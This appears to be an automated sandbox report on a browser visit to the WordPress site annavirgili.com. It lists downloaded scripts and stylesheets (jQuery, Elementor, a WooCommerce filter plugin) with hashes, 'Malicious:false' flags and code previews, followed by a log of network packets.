                                                                                                          SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                                                                          SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                                                                          SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                                                                                                          Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (692)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):880
                                                                                                          Entropy (8bit):5.14196063083674
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:NhCf1NhbmSH4J4VLHuHlz1xZ0oi+UEP3p:NhCfrsSHCyIlp0odUEvp
                                                                                                          MD5:B045121A36D5EE0879462864E20EDF9D
                                                                                                          SHA1:D0E40DEFA674F372E31AAE81AF0742E1E72816A8
                                                                                                          SHA-256:2A8CFEC8C79789EE642BF0021FB2B00D5B5CDB2AB9CD2B81F325CE4037481322
                                                                                                          SHA-512:C746EA63FD093B985A962E520B8CD52F36D863DA92D064223315A174CD69F802F427C324C7584C6B12A9A9D32DDE3CDDDD6D9CF964F2EDF8F3AB1E069ED07095
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * jQuery UI Effects Blind 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../version","../effect"],e):e(jQuery)}(function(s){"use strict";return s.effects.define("blind","hide",function(e,t){var i={up:["bottom","top"],vertical:["bottom","top"],down:["top","bottom"],left:["right","left"],horizontal:["right","left"],right:["left","right"]},o=s(this),n=e.direction||"up",c=o.cssClip(),f={clip:s.extend({},c)},r=s.effects.createPlaceholder(o);f.clip[i[n][0]]=f.clip[i[n][1]],"show"===e.mode&&(o.cssClip(f.clip),r&&r.css(s.effects.clipToBox(f)),f.clip=c),r&&r.animate(s.effects.clipToBox(f),e.duration,e.easing),o.animate(f,{queue:!1,duration:e.duration,easing:e.easing,complete:t})})});
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with very long lines (8930), with CRLF, LF line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):208219
                                                                                                          Entropy (8bit):5.530583276023314
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:3HfPlrtHX+UZJl9I/aN8J6TDDbCirO6yY+NkJdDAxLg+5CjP+bs6Kfw+3CcdPeym:l5+UZJEbJIDtPeym
                                                                                                          MD5:E6F316DF74C47256D40E82E64614DA08
                                                                                                          SHA1:9F5EA5B4B0AFF0BAD064CB844CC19FB69D534389
                                                                                                          SHA-256:03885B9304040C4A0FE7F47B7F3C79FC96F7A04941823514C35C8ACB622991E9
                                                                                                          SHA-512:8116AD557AA4F0255AB63DBAF7D65AAFEF7E842E35F15DE2EA5FCE764A055CE7DF53B52C254C502722AEC51C7B196ED3586F95D978D54C99C4748FDD44CA1085
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/
                                                                                                          Preview:<!doctype html>.<html lang="it-IT">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2.0">. <title>Anna Virgili</title>.<meta name='robots' content='max-image-preview:large' />..<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>..<link rel='dns-prefetch' href='//www.googletagmanager.com' />.<link rel='dns-prefetch' href='//fonts.googleapis.com' />.<link rel="alternate" type="application/rss+xml" title="Anna Virgili &raquo; Feed" href="https://annavirgili.com/feed/" />.<link rel="alternate" type="application/rss+xml" title="Anna Virgili &raquo; Feed dei commenti" href="https://annavirgili.com/comments/feed/" />.<script type="text/javascript">./* <![CDATA[ */.window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemo
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3545
                                                                                                          Entropy (8bit):4.544468898754614
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:dS5gRBcJNf19dYdyIxcmCXmT8w+p+xgMzf:M5gRBcJNf19dYdyIxcmNT87p+xgML
                                                                                                          MD5:7765D912B815D023405044D5A67932C7
                                                                                                          SHA1:99BB63A7C3BA0BEF83D0D60A0AC5E22FA7543F45
                                                                                                          SHA-256:EA27ADEFE5FFB2B2306D13DC337D3CDC23031D2816EFA3FA7B4F06A4377EED9D
                                                                                                          SHA-512:8DF08B3460C18F7761188121B37587C4490E2CAA9D1E1285775548A24EB92083655B534B1A1EFA879FCFD8014E980FC351839DF529A363A744547C5401EB768D
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:"use strict";.function woof_init_image() {. //http://jsfiddle.net/jtbowden/xP2Ns/. jQuery('.woof_image_term').each(function () {. var image = jQuery(this).data('image');. var styles = jQuery(this).data('styles');. if (image.length > 0) {. styles += '; background-image: url(' + image + '); ';. } else {. styles += '; background-color: #ffffff;';. }.. var span = jQuery('<span style="' + styles + '" class="' + jQuery(this).attr('type') + ' ' + jQuery(this).attr('class') + '" title=""></span>').on('click',woof_image_do_check).mousedown(woof_image_do_down).mouseup(woof_image_do_up);. if (jQuery(this).is(':checked')) {. span.addClass('checked');. }. jQuery(this).wrap(span).hide();. jQuery(this).after('<span class="woof_image_checked"></span>');//for checking. });.. function woof_image_do_check() {. var is_checked = false;. var radio=false;. if(jQuery(this).pa
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (1324), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1324
                                                                                                          Entropy (8bit):4.304924023820123
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:l5XDkM5uT5IvKIXFrIBE5I26+JI2dqKI2vrI27hSI2p5I2++JI2PZrI2P66:c/Y3NZl7oBJPLP66
                                                                                                          MD5:6D3035233D2C82F23C066A798E85C17C
                                                                                                          SHA1:B440A7CEBE6AD450C02F98035C1DC9DE212E4CCE
                                                                                                          SHA-256:A1782A1A429AA942BDDCFA3F5511E8B8DE26CC27B2F65FBCE7958E3B9F236432
                                                                                                          SHA-512:B5C867F4DBB3443CE78440D4FF1BA47134249C0F10B69942AE8B2CC12376C4355E02E1C849D2644C200F5DB9DBA91BF55D457619F89E0ABB5DC866DC4BE944D1
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/plugins/tooltipster/sideTip/themes/tooltipster-sideTip-noir.min.css?ver=3.3.0
                                                                                                          Preview:.tooltipster-sidetip.tooltipster-noir .tooltipster-box{border-radius:0;border:3px solid #000;background:#fff}.tooltipster-sidetip.tooltipster-noir .tooltipster-content{color:#000}.tooltipster-sidetip.tooltipster-noir .tooltipster-arrow{height:11px;margin-left:-11px;width:22px}.tooltipster-sidetip.tooltipster-noir.tooltipster-left .tooltipster-arrow,.tooltipster-sidetip.tooltipster-noir.tooltipster-right .tooltipster-arrow{height:22px;margin-left:0;margin-top:-11px;width:11px}.tooltipster-sidetip.tooltipster-noir .tooltipster-arrow-background{border:11px solid transparent}.tooltipster-sidetip.tooltipster-noir.tooltipster-bottom .tooltipster-arrow-background{border-bottom-color:#fff;top:4px}.tooltipster-sidetip.tooltipster-noir.tooltipster-left .tooltipster-arrow-background{border-left-color:#fff;left:-4px}.tooltipster-sidetip.tooltipster-noir.tooltipster-right .tooltipster-arrow-background{border-right-color:#fff;left:4px}.tooltipster-sidetip.tooltipster-noir.tooltipster-top .tooltipste
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (37635)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):37674
                                                                                                          Entropy (8bit):5.189436479341472
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:2RxqDvxJMEa/mjV5rVehz8P8QEAzDc5GfTSebsvZiV1uUUPSz5oedXLf2v3x+FP0:2Rxq7xJMEairVnXEAzDc5ITSebsRiV16
                                                                                                          MD5:361105B44EBABAE341A9F5E44F85DB04
                                                                                                          SHA1:86C4A2C7D84E6D9D14927888AD60CBECB720C5B8
                                                                                                          SHA-256:33075D9D58CF7FBE468294E693402E85BB2D50F86EE5B42091E5190EEDD75AFC
                                                                                                          SHA-512:2A35C8768B4046274877D2D7FF0ED8C42946B22387C7F61A6D0F1C1B449A8E4D165FA7518E4A1691527E9116CE643C74A4577D8A9BA7417008895E20549BE7BE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.6.1
                                                                                                          Preview:/*! elementor - v3.6.1 - 23-03-2022 */."use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[819],{9220:(e,t,n)=>{var i=n(7914);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var s=i(n(8135));class _default extends elementorModules.ViewModule{constructor(...e){super(...e),this.documents={},this.initDocumentClasses(),this.attachDocumentsClasses()}getDefaultSettings(){return{selectors:{document:".elementor"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$documents:jQuery(e.document)}}initDocumentClasses(){this.documentClasses={base:s.default},elementorFrontend.hooks.doAction("elementor/frontend/documents-manager/init-classes",this)}addDocumentClass(e,t){this.documentClasses[e]=t}attachDocumentsClasses(){this.elements.$documents.each(((e,t)=>this.attachDocumentClass(jQuery(t))))}attachDocumentClass(e){const t=e.data(),n=t.elementorId,i=t.elementorType,s=this.documentClasses[i]||this.documentClasses.base;this.documents[n]=ne
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65493)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):132804
                                                                                                          Entropy (8bit):5.111206986028066
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:QhLOaWbzhwMQU1nTVPhEhcHqkeSYPEMqIjZBywdIAm6YIzo+ajpy4UX8ulaij86Q:l3yxWNVNlx7gdBaL
                                                                                                          MD5:5B957A80A02395D0183527BDA5A86E64
                                                                                                          SHA1:4D985B49A7AB3953DFF5355ECAC6885E97D40CED
                                                                                                          SHA-256:7EC7AC5F949B4D6F1DD313C062EC21769E446BCB17FEC74ACE339C3BCC8FAF94
                                                                                                          SHA-512:338AFE13694BD05E2FDC59A36983C5CF036FACC76B2C4F0294BFED9412B89E79B711F28B24C76746A4B9A10F14AE58219D94D5E589D517A8A6F7D411E3E34C53
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?ver=3.6.4
                                                                                                          Preview:/*! elementor-pro - v3.6.4 - 15-03-2022 */."use strict";(self.webpackChunkelementor_pro=self.webpackChunkelementor_pro||[]).push([[995,26,534,369,804,888,680,121,288,42,50,985,287,824,58,114,443,838,685,858,102,1,124,859,979,497],{9978:(e,t,s)=>{var n=s(7914),i=n(s(5574)),o=n(s(9743)),r=n(s(8102)),a=n(s(585)),l=n(s(9086)),d=n(s(1559)),c=n(s(9937)),h=n(s(7317)),m=n(s(2140)),u=n(s(6484)),p=n(s(6208)),g=n(s(8746)),f=n(s(1060)),v=n(s(3334)),_=n(s(5475)),S=n(s(224)),y=n(s(7318));const extendDefaultHandlers=e=>({...e,...{animatedText:i.default,carousel:o.default,countdown:r.default,form:a.default,gallery:l.default,hotspot:d.default,lottie:c.default,nav_menu:h.default,popup:m.default,posts:u.default,share_buttons:p.default,slides:g.default,social:f.default,themeBuilder:_.default,themeElements:S.default,woocommerce:y.default,tableOfContents:v.default}});elementorProFrontend.on("elementor-pro/modules/init:before",(()=>{elementorFrontend.hooks.addFilter("elementor-pro/frontend/handlers",extendDe
                                                                                                          No static file info
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 12, 2024 12:57:44.901702881 CET8049742217.20.58.101192.168.2.24
                                                                                                          Dec 12, 2024 12:57:44.913850069 CET49732443192.168.2.2420.42.73.25
                                                                                                          Dec 12, 2024 12:57:44.923882008 CET4434973220.42.73.25192.168.2.24
                                                                                                          Dec 12, 2024 12:57:44.945607901 CET4974280192.168.2.24217.20.58.101
                                                                                                          Dec 12, 2024 12:57:44.976356030 CET49732443192.168.2.2420.42.73.25
                                                                                                          Dec 12, 2024 12:57:45.034210920 CET4434973220.42.73.25192.168.2.24
                                                                                                          Dec 12, 2024 12:57:45.085743904 CET49732443192.168.2.2420.42.73.25
                                                                                                          Dec 12, 2024 12:57:45.358939886 CET49744443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:45.358974934 CET44349744172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:45.359046936 CET49744443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:45.359203100 CET49744443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:45.359221935 CET44349744172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:45.913885117 CET49712443192.168.2.24104.126.37.201
                                                                                                          Dec 12, 2024 12:57:45.976838112 CET49745443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:45.976876974 CET44349745184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:45.976990938 CET49745443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:45.977159977 CET49745443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:45.977173090 CET44349745184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.289601088 CET49746443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.289658070 CET44349746184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.289741993 CET49746443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.289814949 CET49747443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.289859056 CET44349747184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.289910078 CET49747443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.289998055 CET49746443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.290014982 CET44349746184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.290111065 CET49747443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.290122986 CET44349747184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.367381096 CET49748443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.367424011 CET44349748184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.367521048 CET49748443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.367580891 CET49749443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.367633104 CET44349749184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.367681026 CET49749443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.367839098 CET49750443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.367846966 CET44349750184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.367898941 CET49750443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.368056059 CET49748443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.368069887 CET44349748184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.368153095 CET49749443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.368165970 CET44349749184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.368241072 CET49750443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:46.368253946 CET44349750184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.417438984 CET4974280192.168.2.24217.20.58.101
                                                                                                          Dec 12, 2024 12:57:46.509394884 CET49718443192.168.2.2420.189.173.11
                                                                                                          Dec 12, 2024 12:57:46.509537935 CET49718443192.168.2.2420.189.173.11
                                                                                                          Dec 12, 2024 12:57:46.509664059 CET49718443192.168.2.2420.189.173.11
                                                                                                          Dec 12, 2024 12:57:46.523191929 CET49751443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:46.523226976 CET44349751172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.523305893 CET49751443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:46.523463011 CET49751443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:46.523471117 CET44349751172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.576237917 CET44349744172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.576499939 CET49744443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:46.576529026 CET44349744172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.577677965 CET44349744172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.577749014 CET49744443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:46.579329014 CET49744443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:46.579389095 CET44349744172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.579492092 CET49744443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:46.579500914 CET44349744172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.629712105 CET4434971820.189.173.11192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.629753113 CET4434971820.189.173.11192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.629781008 CET4434971820.189.173.11192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.629836082 CET4434971820.189.173.11192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.629863024 CET4434971820.189.173.11192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.629889965 CET4434971820.189.173.11192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.632612944 CET49744443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:46.910336971 CET4434971820.189.173.11192.168.2.24
                                                                                                          Dec 12, 2024 12:57:46.910410881 CET49718443192.168.2.2420.189.173.11
                                                                                                          Dec 12, 2024 12:57:46.967470884 CET49725443192.168.2.2423.57.90.111
                                                                                                          Dec 12, 2024 12:57:46.967552900 CET49725443192.168.2.2423.57.90.111
                                                                                                          Dec 12, 2024 12:57:47.006764889 CET44349744172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.006825924 CET44349744172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.006923914 CET49744443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:47.007330894 CET49744443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:47.007343054 CET44349744172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.087261915 CET4434972523.57.90.111192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.087291956 CET4434972523.57.90.111192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.203572035 CET44349745184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.203834057 CET49745443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.203854084 CET44349745184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.205591917 CET44349745184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.205672979 CET49745443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.207154036 CET49745443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.207236052 CET44349745184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.257601023 CET49745443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.257615089 CET44349745184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.282439947 CET4434972523.57.90.111192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.282661915 CET49725443192.168.2.2423.57.90.111
                                                                                                          Dec 12, 2024 12:57:47.304480076 CET49745443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.402683973 CET4434972523.57.90.111192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.506340027 CET44349746184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.506397009 CET44349747184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.506625891 CET49746443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.506650925 CET44349746184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.506738901 CET49747443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.506757975 CET44349747184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.508094072 CET44349746184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.508173943 CET49746443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.508199930 CET44349747184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.508256912 CET49747443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.508548975 CET49746443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.508632898 CET44349746184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.508861065 CET49747443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.508940935 CET44349747184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.554498911 CET49746443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.554505110 CET49747443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.554517031 CET44349746184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.554543018 CET44349747184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.582192898 CET44349748184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.582469940 CET49748443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.582498074 CET44349748184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.583564043 CET44349750184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.583770990 CET49750443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.583784103 CET44349750184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.583946943 CET44349748184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.584007025 CET49748443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.584424973 CET44349749184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.584438086 CET49748443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.584523916 CET44349748184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.584652901 CET49749443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.584676981 CET44349749184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.587300062 CET44349750184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.587383986 CET49750443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.587754965 CET44349749184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.587815046 CET49749443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.588459015 CET49750443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.588541031 CET44349750184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.588740110 CET49749443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.588815928 CET44349749184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.601367950 CET49747443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.601833105 CET49746443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.617640972 CET49755443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.617738008 CET44349755184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.617892981 CET49755443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.618055105 CET49755443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.618077993 CET44349755184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.632596016 CET49749443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.632602930 CET44349749184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.634632111 CET49748443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.634643078 CET44349748184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.634773016 CET49750443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.634780884 CET44349750184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.679485083 CET49748443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.679510117 CET49749443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.679512978 CET49750443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:47.739427090 CET44349751172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.739651918 CET49751443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:47.739667892 CET44349751172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.743158102 CET44349751172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.743257999 CET49751443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:47.743587017 CET49751443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:47.743756056 CET44349751172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.788855076 CET49751443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:47.788863897 CET44349751172.64.41.3192.168.2.24
                                                                                                          Dec 12, 2024 12:57:47.835726976 CET49751443192.168.2.24172.64.41.3
                                                                                                          Dec 12, 2024 12:57:48.835529089 CET44349755184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:48.836152077 CET49755443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:48.836183071 CET44349755184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:48.839812994 CET44349755184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:48.839884043 CET49755443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:48.840219021 CET49755443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:48.840389967 CET44349755184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:48.882601976 CET49755443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:48.882611990 CET44349755184.51.149.97192.168.2.24
                                                                                                          Dec 12, 2024 12:57:48.929481030 CET49755443192.168.2.24184.51.149.97
                                                                                                          Dec 12, 2024 12:57:49.820199013 CET49672443192.168.2.242.16.158.192
                                                                                                          Dec 12, 2024 12:57:50.867337942 CET49725443192.168.2.2423.57.90.111
                                                                                                          Dec 12, 2024 12:57:50.987498045 CET4434972523.57.90.111192.168.2.24
                                                                                                          Dec 12, 2024 12:57:51.183893919 CET4434972523.57.90.111192.168.2.24
                                                                                                          Dec 12, 2024 12:57:51.184009075 CET4434972523.57.90.111192.168.2.24
                                                                                                          Dec 12, 2024 12:57:51.184088945 CET49725443192.168.2.2423.57.90.111
